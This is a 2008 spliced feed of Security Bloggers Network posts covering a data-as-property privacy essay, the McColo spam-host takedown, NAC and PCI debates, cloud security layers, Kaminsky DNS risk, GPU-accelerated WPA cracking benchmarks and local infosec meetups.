Thursday, November 13, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Lumension gives away 1GB secured USB memory sticks [Malta Info Security]

Posted: 13 Nov 2008 12:37 PM CST

In an effort to make people more security conscious (and to promote themselves) Lumension (formerly Securewave) are giving away 1Gb Secured sticks. Simply play the flash game and identify 10 security risks among the employees, register and you're on your way to receive a free USB stick as well as being into a draw to win 1 of 3 Lumension software security suites - HP server included!

Put yourself to the test and go grab one ...

Express Scripts Offers $1million Reward for Cyber Extortionists [Darknet - The Darkside]

Posted: 13 Nov 2008 07:18 AM CST

This is an interesting story, I’ll be watching how it develops - it’s not often you see a bounty for online crimes and especially one as enticing as 1 million dollars! That’s a hell of a sum for nailing down some dodgy hackers who are running an extortion scam after a data leak. I really wonder where [...]

Read the full post at

SBN members are attending SC World Congress as press [StillSecure, After All These Years]

Posted: 13 Nov 2008 06:14 AM CST

This post is for my fellow bloggers in the Security Bloggers Network.  If you are planning on attending or would like to attend the SC Magazine World Congress this December at the Javits Center in NYC, you are eligible for a press pass.  The pass allows you to attend sessions and the exhibits for free, as well as more perks.

If you would like to apply for your press credentials please contact me at by Monday. Please include your SBN member blog URL to verify your membership. I am submitting the final list to the SC Mag folks Monday evening.

Also, for the analyst and mainstream media community we will be having a StillSecure cocktail hour.  If you would like an invite please contact me at as well.

It should be a great show and I hope to see many SBN members at there.

Reblog this post [with Zemanta]

An Information Security Place Podcast - Episode 9 [An Information Security Place]

Posted: 13 Nov 2008 05:57 AM CST

Link to MP3

Show notes:

Just Jim and I today talking about news and adding some ranting (as usual).

Segment 1: InfoSec News Update and various ranting

Segment 2:

  • Geek Toys - BlueAnt SuperTooth 3 Review
  • Consultants Corner - Importance of Physical Security
  • We bid you a fond farewell

Music Notes:

  • Intro/Outro - Digital Breaks - “Therapy”
  • Segway 1 - Naked Gun - “A.D.D.”
  • Zinger - JunkTones - “Welcome To the USA”
  • Segway 2 - Kickstart - “Bouncey”


This posting includes an audio/video/photo media file: Download Now

When Did My Personal Information Become Your Property? [The Security Catalyst]

Posted: 13 Nov 2008 04:12 AM CST

A colleague recently asked me, “When did my personal information become someone else’s property?” It’s a vital question, because if my personal information belongs to someone else, then they can do whatever they want with it. If data is property, then they can buy, sell, license, or give away my identity without my consent. This puts me at risk, because I must rely on the good will of a third party to keep my identity secure.

But if personal information really were property, then I should be able to permanently sell, or “alienate,” it. But unfortunately, I can’t sell personal information like a car. If I sell my car and the new owner paints it purple or runs it into a tree, it’s not my problem. But we all know that if I sell my personal information and the new owner “crashes” my identity, I suffer. Unlike all forms of property, personal information is inherently inalienable. Unless you enter the witness protection program, you’re stuck with your identity no matter how many times you sell it, and no matter how many times it is crashed.

Data as Property

Intellectual Property law does not generally treat personal information as property. Most personal information, such as names, addresses, phone numbers, and social security numbers are facts. Facts are not copyrightable. You can’t patent personal information, and it certainly isn’t a trade secret. In short, nobody “owns” my name, including myself. And if someone could “own” my name, it would most logically be my parents, since they created it. But my mom can’t copyright my date of birth, and the government can’t patent my social security number. My phone number is not an AT&T trade secret, nor is it mine.

However, data often behaves like property, and so it is treated as such. Like property, personal information has value. Entire multi-billion dollar industries thrive on the sale and exchange of personal information. Next, like any form of property, personal information in databases can be shared, sold, licensed, stolen, or lost with remarkable efficiency. And unfortunately, you don’t have any constitutional right of privacy when you give your personal data to a third party.

Some laws recognize that personal information has value. For example, United States election law requires candidates disclose the value of all in-kind campaign donations, including databases of potential voters. Other federal and state statutes, such as the Gramm-Leach-Bliley Act and the Sarbanes-Oxley Act, require corporations to account for the fair market value of assets, which may include customer data. Even tort law says that some forms of privacy come from a trademark ownership of one’s name and likeness. And breach notification laws seem to assert that companies which collect personal information “own” it.

Data as Self

But that isn’t the whole story. Unlike every other form of property, you can’t alienate personal information (such as bank account numbers, credit scores, social security numbers, or police reports) even if a third party creates it. Personal information is different from property, since property is presumptively alienable.

In the Information Age, you are not much more than “an electronic collage of bits of information, a digital person composed in the collective computer networks of the world.” In other words, a person may now be defined as just a few pieces of data. This data is your Data Self. Your Data Self is a collection of your credit report, facebook page, Google results, Bank account numbers, archived e-mails, and an endless parade of other data. Your Data Self is a digital alter-ego, with its own personality, dispositions, fallacies and mortality. Your Data Self also has the power to enter contracts, grant access to your financial assets, have surgery, commit crimes, or be kidnapped.

When your Data Self belongs to someone else, it can be forced to act against your will. If someone makes your Data Self sign a contract, you are bound by it. If your Data Self is convicted of a crime, you can go to jail. If someone forces your Data Self to take out a loan, you must repay it. If your Data Self has an operation, you may no longer qualify for medical insurance. If your Data Self is abused, stolen, sold, manipulated, or forced to act against its will, you suffer the consequences. In this sense, “Identity Theft” might be more descriptively defined as “Digital Kidnapping.” Identity Theft is when someone pretends to be you by “kidnapping” your Data Self, doing something bad, and you get blamed.

Data IS Self

In my view, this is a startling development. As long as my Data Self is a third party’s possession, then they can also treat me like property. The now popular crime of Identity Theft is the most visible consequence of this trend. In fact, the very term “Identity Theft” epitomizes the clash between the Data as Property and Data as Self theories of personal information: First, you have an alter-ego digital “identity” or Data Self; and second, your Data Self is subject to theft and abuse, like property.

Fortunately, the 13th Amendment ended slavery, and human muscle, once required for agriculture and labor, does not command the same economic premium in a post-industrial society. Instead, a person’s economic value now lies in his access to financial assets and credit. Our Data Selves are easy to coerce, and we are now worth more in bytes than in flesh and blood. As long as Data Selves are digital property, new crimes similar to identity theft will continue to arise, and our society runs the sinister risk of a new form of human trafficking: A type of Digital Slavery, where third parties can own, abuse, and force Data Selves to act against their will.

Aaron Titus is the Privacy Director for the Liberty Coalition, and welcomes feedback.


1. 19 NO. 7 Intell. Prop. & Tech. L.J. 5, 8
2. Feist Publications, Inc. v. Rural Telephone Service, 499 U.S. 340, 363-64, 111 S.Ct. 1282, 1297 (1991) (Holding that an alphabetized collection of personal facts in a phone book is not copyrightable because 1. Facts are not copyrightable, and 2. The phone book lacks minimally creative selection, coordination, and arrangement. “As a statutory matter, 17 U.S.C. § 101 does not afford protection from copying to a collection of facts that are selected, coordinated, and arranged in a way that utterly lacks originality.”)
3. 35 U.S.C.A. §§ 101-102.
4. Facts in a database may qualify for trade secret protection under state law, but only if the information meets stringent requirements, and remains secret. 19 NO. 7 Intell. Prop. & Tech. L.J. 5, 8.
5. Identity Theft Resource Center, Press Release - 2007 Breach List; Privacy Rights Clearinghouse, A Chronology of Data Breaches.
6. United States v. Miller, 425 U.S. 435, 443-44 (1976) (Holding that bank records have no fourth amendment protection, and are subject to government subpoena with no infringement of an individual’s rights).
7. 2 U.S.C.A § 431(8)(a).
8. “Tort” law is common- or judge-made law that allows people to sue others for doing bad things. For example, the tort of Appropriation of Name or Likeness is when someone uses a person’s name or picture for financial gain: Rest. 2d Torts § 652C cmt a. (1977) (The Tort of Appropriation of Likeness gives the individual “exclusive use of his own identity, in so far as it is represented by his name or likeness, and in so far as the use may be of benefit to him or to others. Although the protection of his personal feelings against mental distress is an important factor leading to a recognition of the rule, the right created by it is in the nature of a property right, for the exercise of which an exclusive license may be given to a third person, which will entitle the licensee to maintain an action to protect it.”);
9. See, e.g. Cal. Civ. Code § 1798.81.5(a).
10. Solove, Daniel J., The Digital Person. New York University Press, New York. 2004. p. 2

Links for 2008-11-12 [] [Sicurezza Informatica Made in Italy]

Posted: 13 Nov 2008 12:00 AM CST

These are the times of your life [StillSecure, After All These Years]

Posted: 12 Nov 2008 09:54 PM CST

hockey I get so busy with work stuff, worrying about the economy, who will win an election, are we secure, that I sometimes forget what is really important.  What is really important is spending time with my family and watching my two little babies grow up to be boys.  I was reminded of that again tonight.  A friend gave us tickets to the Florida Panthers hockey game.  It was last minute and the two boys and I ate dinner, jumped in the car and headed down to the Bank Atlantic Center.

The Panthers do a great job putting on a show for the kids.  Though the arena is less than half full, they have all kinds of contests and other kid related promotions and activities.  My boys really enjoy going to Panther games.

I on the other hand really enjoy going to anything with my two sons.  It never fails that they do and say things that make me realize how fast they are growing up and how lucky I am to have them.  Tonight when they sang the Star Spangled Banner instead of having to tell them to stand, they both got right up.  My youngest son Bradley took off his hat and held it over his heart.  Watching this little 7 year old standing there at attention with his hat over his heart, singing the words to the National Anthem, I was pretty close to tears.

After this a commercial on the scoreboard talked about going to a local college and getting an education so that you "can go places".  My 9 year old son Landon looked at me and said, "Dad that is what I want to do, I want to go to college so I can be like you and go places."  I was so touched that he would want to be like me.  I had to explain to him that going places was more than just actually going to different places, but that there was another meaning to it.  I thought about it. I don't want him to have to go to different places, but I sure as heck hope that he does "go places".  But the simple way he said this which encompassed how he thinks about me was enough to make me realize how blessed I am to have these two boys.

So remember time marches on and the little ones don't stay little forever.  If you are lucky enough to have kids, cherish every day and moment you can spend with them.  Before you know it, they aren't little anymore.

Host of Internet Spam Groups is Cut Off [Vincent Arnold]

Posted: 12 Nov 2008 08:19 PM CST

Spam Drops After Internet Providers Disconnect  a California Hosting Firm

By Brian Krebs Staff Writer
Wednesday, November 12, 2008; 7:16 PM

The volume of junk e-mail sent worldwide dropped drastically today after a Web hosting firm identified by the computer security community as a major host of organizations allegedy engaged in spam activity was taken offline, according to security firms that monitor spam distribution online.

While its gleaming, state-of-the-art, 30-story office tower in downtown San Jose, Calif., hardly looks like the staging ground for what could be called a full-scale cyber crime offensive, security experts have found that a relatively small firm at that location is home to servers that serve as a gateway for a significant portion of the world’s junk e-mail.

The servers are operated by McColo Corp., which these experts say has emerged as a major U.S. hosting service for international firms and syndicates that are involved in everything from the remote management of millions of compromised computers to the sale of counterfeit pharmaceuticals and designer goods, fake security products and child pornography via email.

But the company’s web site was not accessible today, when two Internet providers cut off MoColo’s connectivity to the Internet, security experts said. Immediately after McColo was unplugged, security companies charted a precipitous drop in spam volumes worldwide. E-mail security firm IronPort said spam levels fell by roughly 66 percent as of Tuesday evening.


I prepare to depart Michigan with gifts for you [The Security Catalyst]

Posted: 12 Nov 2008 06:39 PM CST

After a great week in Michigan, tonight we pack up and prepare to head to Ohio tomorrow. Friday promises to be busy and exciting – and then on Saturday, we head to Maryland (Metro DC) for a week. Which brings me to the gifts I promised:

Join a conversation, get a free copy (hardcover) of Into the Breach

First – while in Maryland, I am attending CSI next week in support of the CompTIA Trustmark. It turns out that a chapter of Into the Breach examines how to evaluate, build and improve "third party trust" – what we need for success with our service providers and other vendors.

CompTIA Trustmark is hosting a handful of "catalyst conversations" to discuss my findings and examine how the industry handles this today, and what we can do in the future. This is not a sales pitch; rather, this is an opportunity to come together and work toward a common solution.

For those invited to attend, CompTIA will present you will your own copy of Into the Breach – which I will promptly autograph for you. Drop me an email – securitycatalyst (gmail) if you want to join us.

This leads me to my second offering…

Not going to CSI? Do you want to?

CSI was generous enough to share with me two ways for you to get involved:

* I can offer (I think) a free conference pass with full access – based on response. Here's the deal – share with me the biggest challenge you face in changing how people protect information. The best answer gets a signed copy of the book and a pass to the show (I'll hand you the book at the show).

* If you are already planning to attend, you can get 25% off your registration with code: BLOG25

I will do my best to both tweet (twitter id: catalyst) from CSI and report on interesting talks/findings from the floor. I will also be taking a limited number of vendor meetings to learn more about the products and solutions that make it easier for people to protect information. Shoot me a note if there is a product you want me to check out and report back on. 

Setting the record straight on NAC [StillSecure, After All These Years]

Posted: 12 Nov 2008 05:22 PM CST

Sometimes when you try to explain something you can't help but muddy the waters.  That is exactly what happened to Tim Greene in this article he wrote about endpoint based NAC in Network World. Hey I am not knocking Tim though. I get some of my best material from his column.  Anyway, in this weeks adventure Tim is seeking to compare the pros and cons of endpoint based NAC to other types of NAC technologies.  He has the same old regular guest stars featured, Rob Whitley of Forrester, Ofir Arkin and a couple of special guest star NAC customers.  I am not going to regurgitate Tim's entire article.  Instead lets go to the videotape to the facts.

Here is the background.  There are three types of NAC

  1. Network or infrastructure based NAC - Like Cisco and Juniper and StillSecure, it uses the network switches and infrastructure to enforce and detect devices coming on the network
  2. Endpoint based NAC - an agent on the endpoint does the heavy lifting and the testing and enforcing.
  3. Appliance based NAC - sits on top of the network and usually uses some clever (or flaky) way of enforcing like ARP poisoning, TCP reset and the like.

Also, whether the NAC system is based on testing before or during a device logging on or just waiting until you see something bad is another way of separating the real deal from the pretenders in NAC.

So with that as a background here is what Tim wrote and what I say:

NAC products that enforce policies via Dynamic Host Configuration Protocol (DHCP) proxy servers do nothing to stop machines that obtain static IP addresses and don't use DHCP to make their network connections. That makes significant portions of corporate networks invisible to the NAC access control products, says Ofir Arkin . . .

Come on Tim that is so 2005.  I don't even think Ofir is pushing that crap anymore.  Yes spoofed and static IPs are a challenge, but not fatal.  There are many best practices to overcome this type of issue, not the least of which is an RDAC (remote device activity capture) or scan on connect module such as StillSecure Safe Access NAC has.  Also depending on your switch and DNS/DHCP vendor you can handle this problem that way as well.


The major downside to endpoint-enforced NAC is largely theoretical so far and one that customers seem willing to overlook. The problem is that rootkits can take over machines to make them lie about their health. This underlying endpoint problem can be mitigated by software that monitors behavior of machines to determine if they are acting badly. And lying endpoints haven't actually proven a problem for many customers.

Tim, the "theoretical" problem of trusting an endpoint to report on itself is more real than that. Ask Richard Stiennon if you have any questions.  In fact this is a reason why some people choose not to go endpoint based NAC.  However, that is not the major downside to endpoint based NAC.  The major downside is there is no guest access solution.  What do you do if the endpoint does not have the agent installed and you can't make them install the agent.  Saying that you than need a second type of NAC is not elegant as Rob Whitley says.  In fact it is downright ugly. When you consider that guest or unmanaged access is the biggest driver in NAC, that pretty much sinks the endpoint based NAC approach.

And finally:

To deal with this problem, McAfee, for instance, is adding enforcement of NAC policies based on behavior via its IPS appliance and next year via a dedicated NAC appliance.

Guys, if the only defense you have is IPS, that is fine, but lets not say that is an effective NAC solution for guests.  You are bound by what the IPS can detect and it takes a lot of IPS boxes usually.  Not a scalable model at all.  Of course you could wait for McAfee to resurrect the Lockdown appliances.  It didn't work before and it probably won't work now.

Now wouldn't it be great if there was one NAC solution that covered all of these bases from one management console? You bet.  If you are looking for one that does that let me know or check out StillSecure Safe Access!

Cloud Security Macro Layers []

Posted: 12 Nov 2008 04:47 PM CST

There’s been a lot of discussion on cloud computing in the blogosphere and general press lately, and although I’ll probably hate myself for it, it’s time to jump in beyond some sophomoric (albeit really funny) humor.

Chris Hoff inspired this with his post on TCG IF-MAP; a framework/standard for exchanging network security objects and events. Its roots are in NAC (Network Access Control), although as Alan Shimel informs us, there’s been very little adoption to date.

Since cloud computing is a crappy marketing term that can mean pretty much whatever you want, I won’t dig into the various permutations here. For this post I’ll be focusing on distributed services (e.g., grid computing), online services, and SaaS. I won’t be examining “cloud filtering” and other network-only services.

Chris’s posting, and most of the ones I’ve seen, are heavily focused on network security concepts as they relate to the cloud. But if we look at cloud computing at the macro level, there are additional layers which are just as critical (in no particular order):


  • Network: The usual network security controls.
  • Service: Security around the exposed APIs and services.
  • User: Authentication- which in the cloud world, needs to move to more adaptive authentication, rather than our current static username/password model.
  • Transaction: Security controls around individual transactions- via transaction authentication, adaptive authorization, and other approaches.
  • Data: Information-centric security controls for cloud based data. How’s that for buzzword bingo? Okay, this actually includes security controls for the back-end data, distributed data, and any content exchanged with the user.

Down the road we’ll dig into these in more detail, but any time we start distributing services and functionality over an open public network with no inherent security controls, we need to focus on the design issues and reduce design flaws as early as possible. We can’t just look at this as a network problem- our authentication, authorization, information, and service (layer 7) controls are likely even more important.

This gets me thinking it’s time to write a new framework- not that anyone will adopt it.

Risk Management presentation by Dr. Peter Tippett [Kees Leune]

Posted: 12 Nov 2008 02:18 PM CST

I attended a two-hour presentation by Dr. Peter Tippett of Verizon Business's Cybertrust group at the Grant Hyatt Hotel in New York City (nice!) today.

Dr. Tippett is on tour to let the world know about the data breach investigations report that his team put together and published earlier this year. At the very least, the presentation was entertaining, but there were even some interesting bits here and there.

Dr. Tippett is a scientist.

Assume that someone says: We need to patch one per day.

In Tippett's view, that is a hypothesis and a hypothesis needs to be tested to determine its validity. These tests can be performed either by analyzing data, or by conducting a controlled experiment.

In many cases, Tippett claims, testing a hypothesis (we need more of product X) will show that the marginal benefits of deploying more (of the same) technology does not outweigh the marginal costs. For example, patching once a day instead of once a month might be much more expensive than the costs that are averted by it. If that hypothesis is proven to be true, patching once per month instead of once per day would be a colossal waste of resources. The costs would not outweight the benefits.

In an ideal risk-assessment scenario, sufficient data is available to estimate such a risk (defined as: likelihood ∙ impact) before a decision must be made, rather than in hindsight after a solution has been implemented.

Most organization lack the body of experience to be able to compute these risks at all, or at least in a way that is statistically significant enough to be usable. Most organizations are unwilling (or unable) to design and execute an experiment and draw conclusions based on the outcome of those experiments.

These two observations are the death-blow for a formal risk management approach to information security.

Until sufficient reliable data becomes available (at reasonable costs), organizations will never be able to build their information security programs based on a formal risk management approach.

When such data does become available (and it is starting to), the IT security landscape will change. Until then, risk management will be predominantly something we talk about, rather than practice.

2008 Worldwide Infrastructure Security Report [Vincent Arnold]

Posted: 12 Nov 2008 12:35 PM CST

Growing financial pressures, unforeseen threats, and a volatile and rapidly changing business landscape — apt descriptions for both the world economy and this years Worldwide Infrastructure Security Survey.

Arbor Networks once again has completed a survey of the largest ISPs and content providers around the world. Some 70 lead security engineers responded to 90 questions covering a spectrum of Internet backbone security threats and engineering challenges. This fourth annual survey covered the 12-month period from August 2007 through July 2008.

A copy of the full report is available at

VMware’s Biggest Threat isn’t Microsoft [ARCHIMEDIUS]

Posted: 12 Nov 2008 11:01 AM CST

    VMware's biggest threat is virtualization-lite, or the confinement of the virtualization business case to hypervisor VLANS.  VMware needs to get enterprises to the bigger picture, the full realization of the benefits of virtualization in the data center, including VMotion.  Otherwise, deployments will only be limited to a subset of environments driven by novelty or perhaps [...]

Is search about to experience a riot [StillSecure, After All These Years]

Posted: 12 Nov 2008 10:48 AM CST

Alta Vista, Excite, Infoseek, Ask Jeeves - do any of these ring a bell?  The back alleys of Silicon Valley are littered with the corpses of search engines that couldn't. Google has beaten most of these names into the annals of history.  Only Yahoo and Microsoft (with their deep pockets) still put up some token resistance to the Borg-Google collective. Why? Do we like the Google color schemes?  Do the double "0s" get us.  Do we like the idea of advertiser based searching?  No, No and no.  We use Google because more than any other search engine out there, when we want to find something, Google finds it for us.  The algorithms and intelligence Google uses results in what we are looking for.  Forget Android, Google Apps, Google Maps and all of that other stuff, we use Google because their search renders the most relevant results.

oneriotgif Could there by a new player on the horizon that that gives us more relevant results?  Could there be a "riot" in the search arena?  If you believe what the folks at OneRiot say, there very well could be. In an age of social networking, this is a social search engine.  OneRiot gives you search results not based upon how many links are there to that page.  The results you get are based upon the popularity of those pages as measured by people on the net.  This should result in links not to the wikipedia page, but to pages that real people look at when looking for a particular keyword.  This could be the key to breaking out of the collective. To paraphrase what Jon Landau once said about Bruce Springsteen, I have seen the future of Internet search and its name is OneRiot.

Besides the search OneRiot plays on its social media roots and has some really great add ons.  There are plug ins for my space (why no facebook guys?), twitter, web slices for IE8, etc.  Check them out.  Also you can make their searches better by installing their pulse checker.

OneRiot is based in Boulder, Co and in full disclosure I have some friends who work there.  But don't let that hold you back.  Go check out OneRiot and see for yourself that there can be more to search than being another drone of the collective.

Reblog this post [with Zemanta]

When The Carrot Doesn't Work, Try a Stick: VMware Joins PCI SSC... [Rational Survivability]

Posted: 12 Nov 2008 10:04 AM CST

Carrotstick I've made no secret of my displeasure with the PCI Security Standards Council's lack of initiative when it comes to addressing the challenges and issues associated with virtualization and PCI compliance. 

My last post on the topic  brought to light an even more extreme example of the evolution of virtualization's mainstream adoption and focused on the implications that cloud computing brings to bear when addressing the PCI DSS.

I was disheartened to find that upon inquiring as to status of the formation of and participation in a virtualization-specific special interest group (SIG,) the SSC's email response to me was as follows:

On Oct 29, 2008, at 1:24 PM, PCI Participation wrote:

Hello Christofer,

Thank you for contacting the PCI Security Standards Council. At this
time, there is currently no Virtualization SIG.
The current SIGs are
Pre-Authorization and Wireless.

Please let us know if you are interested in either of those groups.

The PCI Security Standards Council

-----Original Message-----
From: Christofer Hoff []
Sent: Wednesday, October 29, 2008 12:58 PM
To: PCI Participation
Subject: Participation in the PCI DSS Virtualization SIG?

How does one get involved in the PCI DSS Virtualization SIG?


Christofer Hoff

The follow-on email to that said there were no firm plans to form a virtualization SIG. <SIGh>

So assuming that was the carrot approach, I'm happy to see that VMware has taken the route that only money, influence and business necessity can bring: the virtualization vendor 'stick.'  To wit (and a head-nod to David Marshall:)

VMware is Joining PCI Security Standards Council as Participating Organization
VMware, the global leader in virtualization solutions from the desktop to the datacenter, announced today that it is joining the PCI Security Standards Council. As a participating organization, VMware will work with the council to evolve the PCI Data Security Standard (DSS) and other payment card data protection standards. This will help those VMware customers in the retail industry who are required to meet these standards to remain compliant while leveraging VMware virtualization. VMware has also launched the VMware Compliance Center Web site, an initiative to help educate merchants and auditors about how to achieve, maintain and demonstrate compliance in virtual environments to meet a number of industry standards, including the PCI DSS.

As a participating organization, VMware will now have access to the latest payment card security standards from the council, be able to provide feedback on the standards and become part of a growing community that now includes more than 500 organizations. In an era of increasingly sophisticated attacks on systems, adhering to the PCI DSS represents a significant aspect of an entity's protection against data criminals. By joining as a participating organization, VMware is adding its voice to the process.

"The PCI Security Standards Council is committed to helping everyone involved in the payment chain protect consumer payment data," said Bob Russo, general manager of the PCI Security Standards Council. "By participating in the standards setting process, VMware demonstrates it is playing an active part in this important end goal."

Let's see if this leads to the formation of a virtualization SIG or at least a timetable for when the DSS will be updated with virtualization-specific guidelines.   I'd like to see other virtualization vendors also become participating organizations in the PCI SSC.


1 In 4 DNS Servers Still Vulnerable? More Like 4 in 4 []

Posted: 12 Nov 2008 09:45 AM CST

I was reading this article over at NetworkWorld today on a study by a commercial DNS vendor that concluded 1 in 4 DNS servers is still vulnerable to the big Kaminsky vulnerability.

The problem is, the number is more like 4 in 4.

The new attack method that Dan discovered is only slowed by the updates everyone installed, it isn’t stopped. Now instead of taking seconds to minutes to compromise a DNS server, it can take hours.

Thus if you don’t put compensating security in place, and you’re a target worth hitting, the attacker will still succeed.

This is a case where IDS is your friend- you need to be watching for DNS traffic floods that will indicate you are under attack. There are also commercial DNS solutions you can use with active protections, but for some weird reason I hate the idea of paying for something that’s free, reliable, and widely available.

On that note, I’m going to go listen to my XM Radio. The irony is not lost on me.

PCI News Flash! New SAQs for version 1.2! [Branden Williams' Security Convergence Blog]

Posted: 12 Nov 2008 07:34 AM CST

The PCI Security Standards Council released the new version of the Self Assessment Questionnaires yesterday, as well as a new Navigating PCI-DSS for version 1.2.


Graphics cards are for cracking [Errata Security]

Posted: 12 Nov 2008 05:11 AM CST

I finally got around to testing Elcomsoft's WPA password cracking. If you'll remember, Elcomsoft announced last month that they could use the graphic card to crack WPA passwords 100 times faster than with a normal processor. I found it's not 100 times faster, but the acceleration is significant enough that if you do WiFi pentesting, you should probably get a graphics card to speed this up.

I ran their software on a number of systems. A screen shot of the results are below:
The systems are:
  • "Core2Duo-GT260" is a nVidia GT260 GPU, w/ Core 2 Duo 3.0-GHz
  • "Core2Quad" is a Core 2 quad 2.4-GHz.
  • "EEE901" is an an Intel Atom 1.6-GHz dual-threaded.
  • "MacBookAir" is using the nVidia 9400m GPU, w/ Core 2 Duo 1.86-GHz
  • "Pentium3-400MHz" is using Intel Pentium III 400MHz single core CPU

Using the nVidia GT260 graphics card, the system could test roughly 10-thousand password hashes-per-second. A cheap quad-core CPU can only do about 1-thousand password hashes-per-second. This is not the 100-fold speed-up promised, but it is an impressive 10-fold speed-up.

I tried out some other processors as well. Intel has shipped a new extremely-mobile processor (intended for cell-phones) called the "Atom". It has roughly a tenth the CPU power of the desktop processor.

A tested the MacBook Air. Its graphics accelerator is actually slower than the built-in processor. Its 9400m GPU only does 178 hashes-per-second, but the Core 2 Duo could do around 400 hashes-per-second.

Graphics cards work by having a lot of tiny/simple processors. Here is a breakdown of some typical processors:

In theory, the speed of the cracking software should correlate with the frequency multiplied by the number of cores. The card to get right now is probably the 9800 GX2. I just ordered one from Newegg for $274. It puts two chips together on a single card, which should make it faster (as well as cheaper) than the GT260. I spent another $200 to get a system to go around it.

Elcomsoft currently cannot handle different cards. Therefore, when cracking software on a MacBook Pro (which has a 9400m and a 9600m), you won't be able to use both simultaneously.

OWASP - VA Local Chapter Infosec Meetup Event - Thursday, 11-13: Web Security Testing []

Posted: 12 Nov 2008 12:23 AM CST

Here is some information regarding this week’s Thursday OWASP - VA Local Chapter infosec meetup event. If you plan on attending, RSVP to Jeremy Epstein (email available in their post - linked below) so they can get your badge processing started.

  • Who: Nadya Bartol, Booz Allen Hamilton & Paco Hope, Cigital
  • What:
    • Bartol - Framework for Software Assurance: Nadya’s presentation will provide an update on the Software Assurance Forum efforts to establish a comprehensive framework for software assurance (SwA) and security measurement. The Framework addresses measuring achievement of SwA goals and objectives within the context of individual projects, programs, or enterprises. It targets a variety of audiences including executives, developers, vendors, suppliers, and buyers. The Framework leverages existing measurement methodologies, including Practical Software and System Measurement (PSM); CMMI Goal, Question, Indicator, Measure (GQ(I)M); NIST SP 800-55 Rev1; and ISO/IEC 27004 and identifies commonalities among the methodologies to help organizations integrate SwA measurement in their overall measurement efforts cost-effectively and as seamlessly as possible, rather than establish a standalone SwA measurement effort within an organization. The presentation will provide an update on the SwA Forum Measurement Working Group work, present the current version of the Framework and underlying measures development and implementation processes, and propose example SwA measures applicable to a variety of SwA stakeholders. The presentation will update the group on the latest NIST and ISO standards on information security measurement that are being integrated into the Framework as the standards are being developed.
    • Hope - The Web Security Testing Cookbook: The Web Security Testing Cookbook (O’Reilly & Associates, October 2008) gives developers and testers the tools they need to make security testing a regular part of their development lifecycle. Its recipe style approach covers manual, exploratory testing as well automated techniques that you can make part of your unit tests or regression cycle. The recipes cover the basics like observing messages between clients and servers, to multi-phase tests that script the login and execution of web application features. This book complements many of the security texts in the market that tell you what a vulnerability is, but not how to systematically test it day in and day out. Leverage the recipes in this book to add significant security coverage to your testing without adding significant time and cost to your effort.
  • When: 11/13, 6:00 - 8:30 PM EST
  • Where: Booz Allen, One Dulles Facility (13200 Woodland Park Road; Herndon, VA 20171)

For more information on the OWASP - VA Local Chapter, see its description in our NoVA Meetups section. View our Calendar for a complete list of infosec events in and around the NoVA area. Here is a link to the page with information on this meetup.

ISACA - CM Chapter Infosec Meetup Event - Wednesday, 11-12: Strong User Authentication []

Posted: 12 Nov 2008 12:02 AM CST

Here is some information regarding this week’s Wednesday ISACA - Central Maryland (CM) Chapter infosec meetup event. A little late on this one I guess.

  • Who: Chris Kostick, Ernst & Young
  • What: Enterprise-wide Strong User Authentication: Are We There Yet?
    • Many security experts believe that employee username and passwords are passé and on the way out. Is that true? If so, what is the alternative? This session discusses the different aspects of using strong authentication for internal users to systems and applications. It examines the technologies available, the benefits/challenges of deploying these technologies, where it’s been successful, where it hasn’t, the barriers of deployment, and what we can do about it. The following topics will be covered: The options for strong authentication technologies for the enterprise; Pros/cons of the technologies and why; Challenges to deployment; Practical examples of deployment; Determine tactics and discussion points with the vendors; and Present a framework for managing strong authentication for internal users over the entire enterprise.
  • When: 11/12, 11:00 - 4:30 PM EST
  • Where: Snyder’s Willow Grove Restaurant (841 North Hammonds Ferry Road, Linthicum, MD)

For more information on the ISACA - CM Chapter, see its description in our NoVA Meetups section. View our Calendar for a complete list of infosec events in and around the NoVA area. Here is a link to the page with information on this meetup.

I Can Haz TCG IF-MAP Support In Your Security Product, Please... [Rational Survivability]

Posted: 11 Nov 2008 02:33 PM CST

Quantumlolcat In my previous post titled "Cloud Computing: Invented By Criminals, Secured By ???" I described the need for a new security model, methodology and set of technologies in the virtualized and cloud computing realms built to deal with the dynamic and distributed nature of evolving computing:

This basically means that we should distribute the sampling, detection and prevention functions across the entire networked ecosystem, not just to dedicated security appliances; each of the end nodes should communicate using a standard signaling and telemetry protocol so that common threat, vulnerability and effective disposition can be communicated up and downstream to one another and one or more management facilities.

Greg Ness from Infoblox reminded me in the comments of that post of something I was very excited about when it became news at InterOp this last April: the Trusted Computing Group's (TCG) extension to the Trusted Network Connect (TNC) architecture called IF-MAP.

IF-MAP is a standardized real-time publish/subscribe/search mechanism which utilizies a client/server, XML-based SOAP protocol to provide information about network security objects and events including their state and activity:

IF-MAP extends the TNC architecture to support standardized, dynamic data interchange among a wide variety of networking and security components, enabling customers to implement multi-vendor systems that provide coordinated defense-in-depth.
Today's security systems – such as firewalls, intrusion detection and prevention systems, endpoint security systems, data leak protection systems, etc. – operate as "silos" with little or no ability to "see" what other systems are seeing or to share their understanding of network and device behavior. 

This limits their ability to support coordinated defense-in-depth.  In addition, current NAC solutions are focused mainly on controlling network access, and lack the ability to respond in real-time to post-admission changes in security posture or to provide visibility and access control enforcement for unmanaged endpoints.  By extending TNC with IF-MAP, the TCG is providing a standard-based means to address these issues and thereby enable more powerful, flexible, open network security systems.

While the TNC was initially designed to support NAC solutions, extending the capabilities to any security product to subscribe to a common telemetry and information exchange/integration protocol is a fantastic idea.


I'm really interested in how many vendors outside of the NAC space are including IF-MAP in their roadmaps. While IF-MAP has potential in convential non-virtualized infrastructure, I see a tremendous need for it in our move to Infrastructure 2.0 with virtualization and Cloud Computing. 

Integrating, for example, IF-MAP with VM-Introspection capabilities (in VMsafe, XenAccess, etc.) would be fantastic as you could tie the control planes of the hypervisors, management infrastructure, and provisioning/governance engines with that of security and compliance in near-time.

You can read more about the TCG's TNC IF-MAP specification here.



International PCI Compliance Dates Set [Branden Williams' Security Convergence Blog]

Posted: 11 Nov 2008 12:37 PM CST

The day has come! I can't tell you how many merchants have hounded me for compliance dates outside the US and Canada, and then looked at me like I just told them the sky was red when I could not provide them. Visa, Inc. has formally announced global compliance deadlines (thanks JKA!).

If you are a global retailer, or a retailer not based in the US or Canada, the pressure is now on to become compliant with the PCI Standard! Feel free to reach out to a VeriSign QSA if you need assistance!

Compromised Sites Boost PageRank for Porn [Threat Center Live Blog]

Posted: 11 Nov 2008 11:59 AM CST

